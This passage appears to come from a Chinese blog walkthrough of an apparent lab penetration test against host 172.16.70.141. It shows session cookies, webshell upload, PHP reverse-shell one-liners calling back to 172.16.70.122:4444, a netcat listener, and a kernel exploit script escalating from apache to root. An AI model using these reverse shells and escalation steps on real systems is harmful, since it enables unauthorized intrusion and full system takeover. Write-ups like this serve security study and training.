“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “PHPSESSID”,
“value”: “vseftoonmq1vrd6vt4v1pb29s4”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
},
{
“name”: “user_id”,
“value”: “1”,
“domain”: “172.16.70.141”,
“hostOnly”: true,
“path”: “/”,
“secure”: false,
“httpOnly”: false,
“sameSite”: “no_restriction”,
“session”: true,
“firstPartyDomain”: “”,
“storeId”: null
}
]

image-20211219001945520

image-20211219004210534

用一句话 上传大ma

Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QygDgnNb-1640526076767)(https://gitee.com/hashk8/hash32picgo/raw/master/imgs/image-20211219004914251.png)]

image-20211219231531388

Php -v

image-20211226105229326

php -r ‘$sock=fsockopen(“192.168.32.1”,6666);exec("/bin/sh -i <&3 >&3 2>&3");’

php -r ‘$sock=fsockopen(“172.16.70.122”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’

image-20211226105351182

得到shell

nc -vvlp 4444

php -r ‘$sock=fsockopen(“172.16.70.122”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’

image-20211226110456160

image-20211226105425084

image-20211226105449690

image-20211226105646895

sh-3.2$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
cfebce00 0   0      00000000 0        0        00000000 2
cf830e00 0   3198   00000111 0        0        00000000 2
cfc5fa00 6   0      00000000 0        0        00000000 2
cfe78600 7   0      00000000 0        0        00000000 2
cf83b800 9   2528   00000000 0        0        00000000 2
cfe66e00 9   0      00000000 0        0        00000000 2
cf557c00 10  0      00000000 0        0        00000000 2
cf513c00 11  0      00000000 0        0        00000000 2
cfc5f400 15  569    ffffffff 0        0        00000000 2
cfebcc00 15  0      00000000 0        0        00000000 2
cf513a00 16  0      00000000 0        0        00000000 2
cf6b7c00 18  0      00000000 0        0        00000000 2
sh-3.2$ ls

id
uid=48(apache) gid=48(apache) groups=48(apache)

./8478.sh 568
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
id
id
id
id
^[[Auid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)
uid=0(root) gid=0(root) groups=48(apache)






内网渗透 nadao root

image-20211226110232851

<#Title#>

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值